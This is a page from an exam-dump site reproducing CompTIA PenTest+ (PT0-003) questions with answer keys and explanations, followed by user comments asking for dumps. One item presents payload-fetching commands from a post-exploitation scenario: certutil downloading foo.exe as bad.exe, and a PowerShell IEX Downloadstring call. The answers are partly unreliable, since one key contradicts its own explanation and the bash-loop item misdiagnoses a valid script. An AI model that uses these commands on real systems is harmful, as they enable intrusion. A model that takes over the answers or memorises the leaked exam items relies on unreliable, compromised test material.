Amazon
Avaya
Cisco
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL
Juniper
Microsoft
NVIDIA
Okta
Palo Alto Networks
Salesforce
All Vendors
  1. Home
  2. CompTIA
  3. PT0-003

CompTIA PT0-003 Exam (page: 8)
CompTIA PenTest+
Updated on: 12-Jan-2026

Viewing Page 8 of 49
PT0-003 PDF 199 Questions

[Attacks and Exploits]
During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward.
Which of the following types of attacks is this an example of?

  1. SQL injection
  2. SSRF
  3. XSS
  4. Server-side template injection

Answer(s): C

Explanation:

Cross-Site Scripting (XSS) is an attack that involves injecting malicious scripts into web pages viewed by other users. Here's why option C is correct:
XSS (Cross-Site Scripting): This attack involves injecting JavaScript into a web application, which is then executed by the user's browser. The scenario describes injecting a JavaScript prompt, which is a typical XSS payload.
SQL Injection: This involves injecting SQL commands to manipulate the database and does not relate to JavaScript injection.
SSRF (Server-Side Request Forgery): This attack tricks the server into making requests to unintended locations, which is not related to client-side JavaScript execution. Server-Side Template Injection: This involves injecting code into server-side templates, not JavaScript that executes in the user's browser.
Reference from Pentest:
Horizontall HTB: Demonstrates identifying and exploiting XSS vulnerabilities in web applications. Luke HTB: Highlights the process of testing for XSS by injecting scripts and observing their execution in the browser.



A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network.
Which of the following is the next task the tester should complete to accomplish the objective?

  1. Initiate a social engineering campaign.
  2. Perform credential dumping.
  3. Compromise an endpoint.
  4. Share enumeration.

Answer(s): D

Explanation:

Given that the penetration tester has already obtained an internal foothold on the target network, the next logical step to achieve the objective of collecting confidential information and potentially exfiltrating data or performing a ransomware attack is to perform credential dumping. Here's why:
Credential Dumping:
Purpose: Credential dumping involves extracting password hashes and plaintext passwords from compromised systems. These credentials can be used to gain further access to sensitive data and critical systems within the network.
Tools: Common tools used for credential dumping include Mimikatz, Windows Credential Editor, and ProcDump.

Impact: With these credentials, the tester can move laterally across the network, escalate privileges, and access confidential information.
Comparison with Other Options:
Initiate a Social Engineering Campaign (A): Social engineering is typically an initial access technique rather than a follow-up action after gaining internal access. Compromise an Endpoint (C): The tester already has a foothold, so compromising another endpoint is less direct than credential dumping for accessing sensitive information. Share Enumeration (D): While share enumeration can provide useful information, it is less impactful than credential dumping in terms of gaining further access and achieving the main objective. Performing credential dumping is the most effective next step to escalate privileges and access sensitive data, making it the best choice.



[Attacks and Exploits]
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops.
Which of the following technical controls should the tester recommend to reduce the risk of compromise?

  1. Multifactor authentication
  2. Patch management
  3. System hardening
  4. Network segmentation

Answer(s): C

Explanation:

When a penetration tester identifies several unused services listening on targeted internal laptops, the most appropriate recommendation to reduce the risk of compromise is system hardening. Here's why:
System Hardening:
Purpose: System hardening involves securing systems by reducing their surface of vulnerability. This includes disabling unnecessary services, applying security patches, and configuring systems securely. Impact: By disabling unused services, the attack surface is minimized, reducing the risk of these services being exploited by attackers.
Comparison with Other Controls:
Multifactor Authentication (A): While useful for securing authentication, it does not address the issue of unused services running on the system.
Patch Management (B): Important for addressing known vulnerabilities but not specifically related to disabling unused services.
Network Segmentation (D): Helps in containing breaches but does not directly address the issue of unnecessary services.
System hardening is the most direct control for reducing the risk posed by unused services, making it the best recommendation.



[Attacks and Exploits]
A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash
2 for i in {1..254}; do
3 ping -c1 192.168.1.$i
4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

  1. Add do after line 2.
  2. Replace {1..254} with $(seq 1 254).
  3. Replace bash with tsh.
  4. Replace $i with ${i}.

Answer(s): B

Explanation:

The syntax (1..254) is incorrect in Bash, as it uses brace expansion or seq for looping. The correct syntax should be:

for i in $(seq 1 254)
Also, the missing do is an issue, but the syntax error mentioned points specifically to the loop structure. Fixing the sequence format resolves it.

Corrected script:

#!/bin/bash for i in $(seq 1 254); do ping -c1 192.168.1.$i done
From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 4 ­ Scanning & Enumeration):
"Bash scripting is commonly used for automation in enumeration. The 'seq' command generates a sequence of numbers for iteration in loops."


Reference:

CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 4



[Attacks and Exploits]
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?

  1. powershell.exe impo C:\tools\foo.ps1
  2. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
  3. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
  4. rundll32.exe c:\path\foo.dll,functName

Answer(s): B

Explanation:

To execute a payload and gain additional access, the penetration tester should use certutil.exe.
Here's why:
Using certutil.exe:
Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads. Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.
Comparison with Other Commands:
powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.
powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/") (C): Incorrect syntax for downloading and executing a script.
rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.
Using certutil.exe to download and execute a payload is a common and effective method.



Viewing Page 8 of 49



Share your comments for CompTIA PT0-003 exam with other users:

sheik 10/14/2023 11:37:00 AM

@aarun , thanks for the information. it would be great help if you share your email
Anonymous


Random user 12/11/2023 1:34:00 AM

1z0-1078-23 need this dumps
Anonymous


labuschanka 11/16/2023 6:06:00 PM

i gave the microsoft azure az-500 tests and prepared from this site as it has latest mock tests available which helped me evaluate my performance and score 919/1000
Anonymous


Marianne 10/22/2023 11:57:00 PM

i cannot see the button to go to the questions
Anonymous


sushant 6/28/2023 4:52:00 AM

good questions
EUROPEAN UNION


A\MAM 6/27/2023 5:17:00 PM

q-6 ans-b correct. https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-cli-quick-start/use-the-cli/commit-configuration-changes
UNITED STATES


unanimous 12/15/2023 6:38:00 AM

very nice very nice
Anonymous


akminocha 9/28/2023 10:36:00 AM

please help us with 1z0-1107-2 dumps
INDIA


Jefi 9/4/2023 8:15:00 AM

please upload the practice questions
Anonymous


Thembelani 5/30/2023 2:45:00 AM

need this dumps
Anonymous


Abduraimov 4/19/2023 12:43:00 AM

preparing for this exam is overwhelming. you cannot pass without the help of these exam dumps.
UNITED KINGDOM


Puneeth 10/5/2023 2:06:00 AM

new to this site but i feel it is good
EUROPEAN UNION


Ashok Kumar 1/2/2024 6:53:00 AM

the correct answer to q8 is b. explanation since the mule app has a dependency, it is necessary to include project modules and dependencies to make sure the app will run successfully on the runtime on any other machine. source code of the component that the mule app is dependent of does not need to be included in the exported jar file, because the source code is not being used while executing an app. compiled code is being used instead.
Anonymous


Merry 7/30/2023 6:57:00 AM

good questions
Anonymous


VoiceofMidnight 12/17/2023 4:07:00 PM

Delayed the exam until December 29th.
UNITED STATES


Umar Ali 8/29/2023 2:59:00 PM

A and D are True
Anonymous


vel 8/28/2023 9:17:09 AM

good one with explanation
Anonymous


Gurdeep 1/18/2024 4:00:15 PM

This is one of the most useful study guides I have ever used.
CANADA